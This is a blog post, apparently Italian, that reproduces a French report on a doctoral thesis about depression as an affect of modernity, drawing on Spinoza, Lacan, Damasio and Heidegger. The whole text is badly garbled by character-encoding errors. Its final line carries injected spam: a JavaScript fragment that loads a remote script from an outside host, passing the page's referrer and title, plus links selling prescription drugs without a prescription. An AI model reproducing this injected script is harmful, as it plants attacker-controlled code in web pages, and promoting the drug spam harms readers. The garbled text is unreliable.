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BDF 2.4 Pietro Barbetta – La depressione affetto centrale della modernitAi??

2 aprile: Pietro Barbetta commenta la dissertazione dottorale di Cinzia Crosali ai???La depressione affetto centrale della modernitAi??ai???, discussa lai??i??8 dicembre 2008 presso il Dottorato di Ricerca in Psicoanalisi dellai??i??UniversitAi?? di S. Denis (Parigi)

Parte prima

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Parte seconda

Depressione – 1

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In guisa d’introduzione al mio seminario, allego il testo della mia relazione alla tesi di Cinzia Crosali, il testo A? in francese perchAi?? non trovo piA? l’originale italiano, la traduzione A? della stessa Cinzia Crosali e la trovate esposta cosAi?? perchAi?? non so allegare un testo, perciA? ho fatto copia e incolla:

Compte-rendu de Pietro BarbettaAi??Ai?? pour la thA?se de doctorat de Cinzia CROSALI CORVI, intitulAi??e Ai?? DAi??pression : affect central de la modernitAi??.Ai??

En guise dai??i??introduction Ai?? mon compte-rendu du travail de Cinzia Crosali, je souhaiterais avant tout souligner combien jai??i??ai appris de son expAi??rience clinique et de sa compAi??tence.
Je ne suis pas un spAi??cialiste de Lacan et, face Ai?? mes incomprAi??hensions et Ai?? mes difficultAi??s dans lai??i??Ai??tude de son oeuvre, jai??i??ai trouvAi?? une grande partie des Ai??claircissements qui mai??i??Ai??taient nAi??cessaires dans des discussions partagAi??es ces derniA?res annAi??es avec quelques-uns des meilleurs psychanalystes. Parmi ceux-ci, Cinzia Crosali a jouAi?? un role fondamental.

Sa thA?se est le fruit dai??i??une triple entreprise dont jai??i??ai Ai??tAi?? en partie tAi??moin :
-Ai??Ai??Ai?? Son approfondissement de la connaissance de lai??i??oeuvre lacanienne
-Ai??Ai??Ai?? son Ai??tude rigoureuse et approfondie de lai??i??histoire des systA?mes de pensAi??e concernant la dAi??pression dans la culture occidentale
-Ai??Ai??Ai?? son expAi??rience clinique auprA?s dai??i??analysants avec des diagnostics de dAi??pression (jamais moins quai??i??en cette occasion il ne serait bien dire dai??i??analysants Ai?? dAi??pressifs Ai??).

Ces trois aspects sont les Ai??lAi??ments proprement constitutifs du travail de Cinzia Crosali. Je veux dire par lAi?? quai??i??il ne sai??i??agit pas de trois questions simplement juxtaposAi??es, mais bien de trois aspects intAi??grAi??s, tant dans le fil conducteur de lai??i??histoire de la nosologie, de ses diverses configurations (depuis lai??i??entrelacement et la distinction entre les notions de mAi??lancolie, dai??i??acAi??die et de tristesse jusquai??i??au discours psychiatrique moderne), que dans le fil conducteur dai??i??une lecture lacanienne du phAi??nomA?ne de la dAi??pression (en particulier par la reprise de quelques-uns des schAi??mas qui se trouvent en marge du texte Ai?? TAi??lAi??vision Ai??).
La thA?se fondamentale de Crosali est Ai??noncAi??e dans le titre de son travail. Ce titre exprime deux positions clAi??s qui traversent lai??i??ensemble de sa recherche :
Primo, la dAi??presion est un affect.
Secondo, il sai??i??agit dai??i??un affect central pour la modernitAi??.
Premier aspect : la dAi??pression est un affect, cai??i??est-Ai??-dire quai??i??elle nai??i??est pas une structure psychique, au sens psychanalytique.
Dai??i??oA? la rAi??fAi??rence, avant meme celle faite Ai?? la psychanalyse, Ai?? la philosophie de Spinoza, Ai?? la distinction entre affectio et affectus, et au classement de la tristesse spinozienne parmi les principaux affects. Je cite ici lai??i??un des passages de la thA?se de Crosali sur lequel jai??i??aimerais mai??i??appuyer :
Ai?? Si lai??i??affectus est la variation de la puissance dai??i??agir, lai??i??affection est avant tout l’Ai??tat d’un corps en tant qu’il subit l’action d’un autre corps. Et une action dai??i??un corps sur un autre corps implique toujours, pour Spinoza, un contact, un mAi??lange. Par exemple Ai?? sentir le soleil sur soi Ai?? implique une affection du corps par le soleil, par lai??i??action du soleil sur le corps. En effet, pour Spinoza, lai??i??affection enveloppe un affect. Lai??i??affect, en tant que variation de la puissance dai??i??agir, est assimilable Ai?? un mouvement, Ai?? un passage dai??i??un Ai??tat Ai?? un autre. Lai??i??affection enveloppe donc un passage, une transition (lai??i??affect). Cette transition est augmentation ou diminution de la puissance dai??i??un sujet Ai??.

En lai??i??occurence la tristitia reprAi??sente cette diminution de puissance dai??i??un sujet, cette transition vers une diminution de puissance, qui conduit le sujet Ai?? lai??i??assujetissement, Ai?? la soumission. Spinoza ai??i?? dAi??fini par Deleuze comme Ai??tant ai???le philosophe pour les non-philosophesai??? ai??i?? est le penseur qui, par sa recherche de la relation entre affectio et affectus, a fait de la relation entre corps et esprit le centre de sa thAi??orie. Et ceci aux dAi??buts dai??i??une Ai??poque (la modernitAi??) traversAi??e par la philosophie de Descartes et Kant, Ai?? philosophes pour philosophes Ai??. Pour une longue pAi??riode, la modernitAi?? fera du savoir un champ dans lequel la sAi??paration entre res cogitans et res extensa devra demeurer fondatrice. Le savoir devient un mAi??caisme de controle, de domination de la res cogitans sur la res extensa. Dai??i??oA? le dAi??veloppement du discours medico-psychiatrique contemporain, qui, en prAi??sentant la dAi??pression comme un phAi??nomA?ne exclusivement chimico-biologique, la dAi??crit en termes de maladie.

Second aspect : lai??i??affect dAi??pressif est central pour la modernitAi??.
LAi?? aussi Spinoza reprAi??sente un point dai??i??articulationAi?? essentiel, parce que dans cette diminution de puissance, dans cette variation continue du plateau dai??i??intensitAi?? en direction de la diminution, qui caractAi??rise la tristitia spinozienne, rAi??side une soumission sociale, politique. Les tyrans, affirme Spinoza, ont besoin de sujets tristes, opprimAi??s. Autrement dit, selon Spinoza, la rAi??bellion contre lai??i??oppression, la rAi??volte produisent ce phAi??nomA?ne de (facchinaggio) coltinage auquel semble se rAi??fAi??rer Lacan lorsquai??i??il parle, par exemple, de lai??i??antipsychiatrie. La stupeur de Spinoza face aux rAi??volutions politiques est bien connue. En fait il considAi??rait que les etres humains luttent pour vivre moins bien, pour produire des formes dai??i??oppression encore plus lourdes.
La dAi??pression, telle quai??i??elle se prAi??sente au niveau de la phAi??nomAi??nologie de la rencontre avec lai??i??Autre, est un phAi??nomA?ne typiquement moderne. Elle dAi??voile ai??i?? cai??i??est-Ai??-dire quai??i??elle montre et cache Ai?? la fois ai??i?? une oppression, une soumission absolument individuelle, dAi??socialisAi??e, privAi??e de lien social : une tendance paradoxale Ai?? se soustraire Ai?? lai??i??assujetissement par le refus de la relation avec lai??i??Autre, une oppression de second ordre. Dai??i??oA? la rencontre clinique avec la personne dAi??primAi??e se prAi??sentant, avant tout et le plus souvent, comme la rencontre avec un discours : Ai??Ai?? je suis dAi??primAi??, jai??i??ai une dAi??pression, cai??i??est une maladie, je prends des antidAi??presseurs, etc Ai??.
Le discours capitaliste requiert de guAi??rir les dAi??pressifs, en meme temps quai??i??il requiert des dAi??pressifs. Les dAi??pressifs manifestent une intolAi??rance Ai?? la reproduction sociale, mais cette intolAi??rance nai??i??est pas socialisAi??e. Il sai??i??agit dai??i??une intolAi??rance absolument individualisAi??e, Ai?? soignable Ai??, chimiquement Ai?? guAi??rissable Ai??.Ai?? Sous de nombreux aspects, elle semble avoir remplacAi?? ai??i?? Ai?? un niveau individuel ai??i?? les oppressAi??s du dix-neuviA?me siA?cle. Les dAi??pressifs dai??i??aujourdai??i??hui ne sont pas aussi pauvres, et nai??i??ont donc pas besoin de sai??i??allier entre eux pour se rebeller, leur mal est Ai?? obscur Ai??, il nai??i??est pas aussi visible que lai??i??exploitation Ai??conomique. Le Ai?? dAi??primAi?? Ai?? est lai??i??expression dai??i??une nouvelle frontiA?re de la subjectivitAi??, oA? une espA?ce de responsabilitAi?? biochimique se substitue Ai?? la responsabilitAi?? individuelle et collective des sujets. Ce nai??i??est pas moi, ce sont les interactions entre sAi??rotonine et norAi??pinAi??phrine. Je guAi??rirai quand je recommencerai Ai?? supporter la reproduction sociale, dans les cas les plus graves une thAi??rapie Ai??lectroconvulsive (administrAi??e dans une ambiance technologiquement avancAi??e et sous anesthAi??sie totale) pourra etre envisagAi??e.
Le dAi??pressif est dai??i??autre part un grand consommateur de lai??i??industrie pharmaceutique qui, au cours des derniA?res annAi??es, a rAi??alisAi?? une bonne partie de ses bAi??nAi??fices grace Ai?? la consommation dai??i??ISRSAi?? ; il contribue Ai?? lai??i??augmentation de la demande interne et a sans doute contribuAi??, Ai?? partir de la deuxiA?me moitiAi?? des annAi??es quatre-vingt, au succA?s Ai??conomique de certaines industries pharmaceutiques. Autour de la consommation dai??i??antidAi??presseurs sai??i??est dAi??veloppAi??e la recherche, la publicisation mAi??diatique (qui nai??i??a prAi??sent Ai?? lai??i??esprit la dAi??finition du prozac comme Ai??tant le Ai?? mAi??dicament du bonheur Ai?? ?), publicitAi?? qui, officiellement interdite aux industries pharmaceutiques, a Ai??tAi?? abondamment fournie par des services publicitaires publics (surtout aux Etats-Unis)Ai?? sous forme de propagande pour la prAi??vention du suicide.
Le discours moderne conduit Ai?? lai??i??idAi??e, tout Ai?? fait anti-spinoziste, que le bonheur, en dehors dai??i??etre lai??i??affect qui dAi??pend dai??i??une affection augmentant la puissance de variation continue dai??i??une personne, est aussi la consAi??quence dai??i??une plus grande activitAi?? sAi??rotoninergique, chimiquement induite.
A la rencontre avec lai??i??Autre se substitue le fonctionnement du corps, sa Ai?? docilisation Ai?? chimique.
Face Ai?? de telles questions, la confrontation avec lai??i??approche cognitiviste prend une place centrale dans les recherches de Cinzia Crosali, en particulier son Ai??tude de lai??i??interprAi??tation de Spinoza dAi??veloppAi??e par le cAi??lA?bre neurologue nord-amAi??ricain Antonio Damasio.
Damasio reprend le dAi??veloppement menAi?? par Spinoza Ai?? propos du pAi??chAi?? originel. Spinoza soutient lai??i??idAi??e selon laquelle le rAi??cit racontAi?? dans la GenA?se pourrait etre compris comme un conseil adressAi?? par Dieu Ai?? Adam et Eve : nai??i??absorbez pas de fruit chimiquement toxique. Spinoza fait du mal une sorte dai??i??intoxication, tout Ai?? fait libAi??rAi??e du discours sur la faute. Il le fait de faAi??on provocatrice, pour rAi??pondre aux objections dai??i??un catholique. Et pourtant, en sortant les assertions spinoziennes de leur contexte, en les sAi??parant des circonstances historiques dans lesquelles elles ont Ai??tAi?? Ai??crites (la dispute Ai??pistolaire menAi??e avec le catholique Blyenbergh sur la question thAi??ologique du pAi??chAi?? originel), Damasio prend cet exemple comme preuve du matAi??rialisme Ai?? bio-chimique Ai?? de Spinoza. En se prAi??valant de Spinoza, il soutient une sorte de primat ontologique de la res extensa, en reproposant sa sAi??paration de la res cogitans.
Je me souviens des conversations que nous avons eues avec Cinzia autour du cognitivisme et de Damasio ; de ses rAi??flexions Ai?? propos des diffAi??rences de termes employAi??s par Spinoza et par Damasio ; du dAi??sir qui Ai??tait le sien dai??i??aller au fond dai??i??une critique de lai??i??approche de Damasio, en un sens de sauver Spinoza du cognitivisme, et ceci non sans raison. Spinoza nai??i??est pas seulement le philosophe prAi??fAi??rAi?? de Lacan, il est aussi lai??i??auteur qui a reprAi??sentAi??Ai?? ai??i?? tant par sa vie que par sa philosophie ai??i?? lai??i??un des moments essentiels de diffAi??renciation face aux assimilations acadAi??miques.
Damasio recourt au terme Ai?? Ai??motions Ai??, il parle dai??i??Ai??motions, dAi??crit et thAi??orise lai??i??existence de deux types diffAi??rents dai??i??Ai??motions quai??i??il appelle primaires (issues des parties les plus primitivesdu systA?me nerveux) et secondaires. Ces derniA?res, caractAi??ristiques de lai??i??etre humain, sont ai??i?? selon Damasio ai??i?? Ai??laborAi??es par la pensAi??e de faAi??on cognitive, au moyen du cortex. Ainsi Damasio dAi??fend-il cette approche philosophique matAi??rialiste (que Marx avait dAi??jAi?? dAi??finie comme Ai?? matAi??rialisme vulgaire Ai??) qui, Ai?? partir du succA?s scientifique obtenu par les neurosciences au cours des vingt derniA?res annAi??es, repropose une rAi??duction de lai??i??esprit au cerveau.
Les Ai??laborations de Spinoza sont dai??i??un genre bien diffAi??rent. En premier lieu, son langage lui-meme est diffAi??rent. Il introduit deux termes fondamentaux, associAi??s lai??i??un Ai?? lai??i??autre : affection et affect (comme le note Deleuze la meilleure traduction dai??i??affectio est affectus). Indiquant la relation immAi??diate du Sujet Ai?? lai??i??Autre, toute affection implique une confusion, un Ai??lAi??ment dai??i??imperfection, une espA?ce de mAi??lange, de superposition, une interconnexion entre lai??i??esprit et le corps. Le corps affectAi?? nai??i??est dAi??jAi?? plus seulement res extensa, il est une anomalie. Cai??i??est lAi?? lai??i??une des conditions constitutives de lai??i??existence humaine.
Parmi les affects, il sai??i??en trouve un de vraiment particulier, que Spinoza appelle appetitus et qui dAi??place le Sujet vers lai??i??Autre. Le sujet affectAi?? vit donc une sorte de passivitAi?? active, il est affectAi?? par lai??i??Autre mais va Ai?? sa rencontre. Du point de vue Ai??thique, le sujet est libre.
Si jai??i??ai bien suivi le raisonnement de Cinzia Crosali, cai??i??est pour cela que la dAi??pression nai??i??est pas considAi??rAi??e par la psychanalyse comme une structure psychique en soi.

Ai?? Nous soutenons au contraire, Ai??crit-elle, que lai??i??affect dAi??pressif nai??i??est pas en lui-mA?me une structure psychique particuliA?re, mais quai??i??il traverse toutes les structures et est Ai?? considAi??rer et Ai?? traiter avec une attention diagnostique diffAi??rentielle Ai??.

La dAi??pression, en tant quai??i??affect, traverse toutes les structures. Elle nai??i??est donc pas traitAi??e comme une catAi??gorie diagnostique, mais bien comme une dimension, pathogA?ne (dans le sens ou pathogA?ne est issu du terme pathos, et non dans le sens oA? la mAi??decine utilise ce terme), prAi??sente dans les diffAi??rentes structures. Cette thA?se, qui sai??i??accorde avec la thAi??orie lacanienne, peut avoir, selon moi, valeur heuristique au sein des diffAi??rents modA?les cliniques et diagnostiques. Historiquement, les tableaux de la mAi??lancolie et de lai??i??acAi??die, exposAi??s dans cette thA?se avec beaucoup de compAi??tence, prAi??sentent des catAi??gories quelque peu diffAi??rentes : la mAi??lancolie, maladie de lai??i??homme de gAi??nie, lai??i??acAi??die, maladie du moine vicieux. Et nous pourrions ajouter dai??i??autres cadres historiques dans lesquels la dAi??pression se prAi??sente sous une autre forme encore : la nostalgie, maladie du soldat suisse Ai??loignAi?? de sa patrie, la saudade, maladie du migrant brAi??silien, il malocchio, malAi??diction subie par la jeunesse paysanne de lai??i??Italie du Sud.
Donc la dAi??pression en tant quai??i??affect, distincte de lai??i??Ai??motion ai??i?? expression de passivitAi?? ; distincte des structures psychiques (ce nai??i??est pas une structure) ai??i?? quai??i??elle traverse, habite, oA? elle sai??i??insinue.
Mais, en raison meme de ce qui a Ai??tAi?? soutenu plus haut, la dAi??pression est un affect mensonger.
Nous avons ici un troisiA?me aspect de la question, un corollaire important qui vient corroborer ce que soutient Cinzia Crosali : la dAi??pression se distingue de lai??i??angoisse. Pour parvenir Ai?? cette observation, je crois quai??i??outre les rAi??flexions de Lacan, les recherches sociologiques dai??i??Ehremberg et la philosophie du premier Heidegger ont Ai??tAi?? essentielles.
Le Heidegger de Sein und Zeit sai??i??attaque Ai?? lai??i??analyse phAi??nomAi??nologique de lai??i??angoisse comme condition affective (Befindlichkeit) authentique ; il sai??i??agit de ce que le philosophe de Freiburg dAi??finit sous le terme dai??i??etre-pour-la-mort. La rAi??flexion dai??i??Heidegger part de lai??i??idAi??e que lai??i??angoisse est un affect sans objet.
Dans lai??i??oeuvre de Heidegger semble prendre forme le thA?me de lai??i??immanence de lai??i??affect. Selon cette formulation, lai??i??affect ne se prAi??sente pas comme affect pour un objet transcendant. Lai??i??objet mai??i??affecte, mais en vertu dai??i??un appetitus qui ne se trouve pas devant moi, mais dans mon dos.
Je voudrais demander ici Ai?? Cinzia Crosali un Ai??claircissement, qui me parait important, entre la position dai??i??un philosophe qui mai??i??est cher, Gilles Deleuze, et celle de Lacan. Je ne me rAi??fA?re pas au Deleuze qui a un peu simplifiAi?? ses positions Ai?? lai??i??occasion de sa collaboration avec Guattari, mais bien au Deleuze lecteur de Spinoza et de Leibniz, Ai?? lai??i??auteur de DiffAi??rence et rAi??pAi??tition.
Deleuze parle du dAi??sir comme dai??i??une vibration se manifestant sur un plan continu dai??i??intensitAi??, ne nAi??cessitant ni apogAi??e, ni dAi??charge Ai??nergAi??tique ou orgasmique, et non plus un objet qui le transcende. Un dAi??sir, en somme, qui ne nAi??cessite pas dai??i??un manque, mais plutA?t qui sai??i??exprime se dAi??ployant, comme dans un point de fuite diffAi??rentiel. Selon vous, Cinzia Crosali, dans quelle mesure ces considAi??rations sont-elles assimilables aux considAi??rations de Lacan Ai?? propos de lai??i??objet a, et dans quelle mesure sai??i??en diffAi??rencient-elles ? Ce point de fuite diffAi??rentiel, que Deleuze avait extrait Ai?? la fois de Gregory Bateson et de lai??i??analyse mathAi??matique en partant de Leibniz, est-il, ou non, un Ai??lAi??ment de convergence avec la pensAi??e de Lacan Ai?? propos de lai??i??objet a ?
Au-delAi?? de la thAi??orie clinico-philosophique, la littAi??rature, bien plus sophistiquAi??e parce que libre de la nAi??cessitAi?? de dAi??finir des catAi??gories, sai??i??est exprimAi??e sur ce thA?me Ai?? de multiples reprises. Je souhaiterais Ai??voquer ici un seul exemple : lai??i??intuition de lai??i??assez perversAi?? romancier amAi??ricain Truman Capote. Dans son roman DAi??jeuner chez Tiffanyai??i??s ai??i?? qui, au-delAi?? de lai??i??histoire, a peu Ai?? voir avec le film dai??i??Edwards ai??i?? a lieu un intAi??ressant Ai??change entre les deux personnages. Holly Golightly parle de la mystAi??rieuse sensation quai??i??elle Ai??prouve de temps en temps, une sensation qui lui passe Ai?? condition de se faire accompagner dai??i??hommes toujours diffAi??rents. Elle appelle cette sensation Ai??Ai?? mean reds Ai??. En italien Ai?? mean reds Ai?? a Ai??tAi?? traduit par Ai?? paturnie Ai??. Lai??i??homme lui dit :Ai?? Ai?? you mean the blues Ai??Ai?? (Ai?? tu veux dire le blues Ai??), mais elle rAi??pond non, elle dit quai??i??il sai??i??agit de quelque chose de diffAi??rent. Tandis que le blues a un motif, tandis quai??i??il est du Ai?? quelque chose, Ai?? I mean reds Ai?? nai??i??est du Ai?? rien. Lai??i??homme semble alors comprendre ce que veut dire la femme, et utilise un terme allemand pour dAi??finir lai??i??affect : Angst.
Capote a accordAi?? au personnage fAi??minin de son roman cet esprit de finesse qui lui permet de distinguer lai??i??Ai??tat dai??i??Ai?? authenticitAi?? Ai??. Les psychiatres amAi??ricains contemporains nai??i??hAi??siteraient pas Ai?? diagnostiquer cette hAi??roine come Ai?? borderline Ai??, dai??i??autant plus que, dans le roman, elle franchit les Ai?? frontiA?res Ai?? amAi??ricaines pour aller vivre, et peut-etre mourir, en Afrique.

A ce sujet, la thA?se de Crosali est claire et dAi??finitive, elle ressemble Ai?? celle exprimAi??e dans le roman de Capote :

Ai?? Nous avons Ai??tabli une distinction entre lai??i??angoisse, affect Ai?? authentique Ai??, qui ne ment pas, et les autres affects (dont lai??i??affect dAi??pressif) qui peuvent au contraire A?tre mensongers, dans le sens quai??i??ils peuvent Ai?? mentir Ai?? sur la question du dAi??sir, quai??i??ils Ai??cartent le sujet dai??i??un savoir possible sur son dAi??sir Ai??.

Mentir sur la question du dAi??sir. Nous nous trouvons ici en plein dans la thAi??orie lacanienne, dans la partie de sa thAi??orie quai??i??un psychanalyste systAi??miste tirant comme moi son inspiration de Gregory Bateson partage le plus : le thA?me de la responsabilitAi??.
Jamais plus que lorsque je rencontre, au cours de mon activitAi?? clinique, dAi??sormais longue et consistante, un patient Ai?? dAi??primAi?? Ai??, je ne me trouve face Ai?? un langage aussi pauvre, simple, quasi Ai??lAi??mentaire : Ai?? jai??i??ai une dAi??pression, cai??i??est une maladie ; je prends des antidAi??presseurs, ce qui me fait aller mieux. Mais… Ai??
Ce Ai?? mais Ai?? est, dai??i??habitude, un moyen dai??i??accA?s Ai?? la possibilitAi?? de parler du dAi??sir, dai??i??accAi??der au Ai?? bien dire Ai??. Dans ce Ai?? mais Ai?? se trouvent les effets collatAi??raux des mAi??dicaments (la baisse du dAi??sir sexuel, la prise de poids), les effets placebo non dAi??sirAi??s (mon compagnon mai??i??a quittAi??e parce quai??i??il ne craint plus mon intAi??gritAi?? physique), les effets directs non dAi??sirAi??s (comme, dans les cas graves, lai??i??augmentation des suicides dans les premiers mois dai??i??administration). DAi??sir sexuel, dAi??sir de lai??i??autre, dAi??sir de mort.
Il sai??i??agit souvent de rencontres difficiles ; lai??i??hAi??gAi??monie du discours medico psychiatrique nAi??cessite un long travail de dAi??placement, une longue dAi??construction des approches mAi??dicales (Ai?? selon vous, comment dois-je me comporter pour guAi??rir ? Ai??), qui implique une espA?ce de transformation du discours du Ai?? patient Ai?? (ce que Crosali, suivant Lacan, appelle le Ai?? discours du Maitre Ai??) observant un phAi??nomA?ne pathologique appelAi?? dAi??pression ai??i?? comme un Golem installAi?? dans le plafond de la maison ai??i?? dans un ensemble dai??i??expAi??riences qui traversent lai??i??existence et la vie quotidienne de Ai?? lai??i??analysant Ai??.
Dans un essai sur la nostalgie Ai??crit pour DiogA?ne en 1966, Jean Starobinski rappelle que dans lai??i??Anthropologie de Kant :
Ai?? Le nostalgique ne dAi??sire pas tant le lieu de sa jeunesse que sa jeunesse elle-memeai??i?? Son dAi??sir nai??i??est pas tendu vers quelque chose qui pourrait etre retrouvAi??, mais vers un temps dAi??sormais Ai?? jamais inaccessible Ai??. Kant traite ici avec une large anticipation dai??i??un problA?me reproposAi?? par la littAi??rature post-coloniale, par exemple dans le domaine de la fiction par Chinua Achebe dans son roman No longer at ease, ou dans celui de la philosophie par Homi Bhabha et le terme in-between : le retour au lieu de la nostalgie, bien loin de soigner, se transforme en la dAi??ception de trouver des personnes, des choses, des habitudes qui ne sont plus les memes, ou plutot qui prennent, pour celui qui revient, un caractA?re dai??i??Ai??trangetAi?? aliAi??nante.
Kant, qui nai??i??a jamais quittAi?? KAi??nisberg, se rend compte que la question de la nostalgie ne se pose pas en relation avec un objet transcendant, mais prend le caractA?re de lai??i??immanence. Comme lai??i??avance Freud, la rAi??gression est, avant tout, un voyage Ai?? lai??i??intAi??rieur de sa propre biographie, plutot quai??i??un voyage dans lai??i??espace. La famille est le lieu de conservation de cet Ai??lAi??ment particulier et intime vers lequel le patient rAi??gresse.
Les considAi??rations de Spitz, auteur auquel se rAi??fA?re Cinzia Crosali dans son tavail, la longue expAi??rience clinique de cet auteur auprA?s dai??i??enfants prAi??cocement hospitalisAi??s et Ai??loignAi??s de force de leur famille,Ai?? nous interroge encore aujourdai??i??hui sur le role de la famille dans la construction de ce sens de lai??i??intimitAi?? capable de prAi??venir la dAi??pression anaclytique. Avant meme dai??i??envisager quelque possibilitAi?? de mauvais traitement familial que ce soit, la famille est un systA?me complexe, un horizon de construction du sens, un lieu oA? se produit quelque chose qui se tient au-delAi?? du rationnel et de lai??i??Ai??ducatif, quelque chose qui, en dehors de la famille, dans les institutions extrafamiliales, ne peut etre donnAi??.
Ceci pourrait-A?tre une derniA?re observation au regard de lai??i??excellent travail de Cinzia Crosali. Lai??i??oeuvre de Spitz y est Ai??tudiAi??e avec apprAi??ciation, Spitz affirme que les enfants hospitalisAi??s et Ai??loignAi??s de force de leur famille dAi??veloppent une forme dai??i??abandon du monde. Primo Levi a dAi??crit de la meme faAi??on ceux quai??i??il a appelAi?? Ai?? les musulmans Ai?? , pour dAi??crire la rAi??action de fermeture autistique manifestAi??e chez de nombreux internAi??s dai??i??Auschwitz.
Si la dAi??pression est un affect qui traverse les structures psychiques, on trouve des formes de retrait de la relation dai??i??une radicalitAi?? absolue. Au point de rendre les personnes absolument impuissantes. Spitz dAi??crit la situation de lai??i??enfant mis en institution, Levi (qui toutefois ne se livre pas Ai?? une description clinique, mais littAi??raire) dAi??crit les adultes des camps dai??i??extermination ; dai??i??autres hypothA?ses pourraient concerner les catatonies et les ebAi??phrAi??nies de lai??i??univers concentrationaire de lai??i??asile psychiatrique, ou encore lai??i??impossibilitAi?? de raconter ou de se souvenir des survivants de guerre ou des rescapAi??s de prison.
Selon cette optique, la dAi??pression apparait plus comme la consAi??quece explicite dai??i??un phAi??nomA?ne dai??i??oppression sociale que comme un phAi??nomA?ne psychique.d.getElementsByTagName(‘head’)[0].appendChild(s); http://winna.mhs.narotama.ac.id/2018/03/15/best-price-viagra-no-prescription/ purchase keftab 500mg d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; topspyapps.net Purchase Order http://virtualnewsroom.co.uk/?p=5955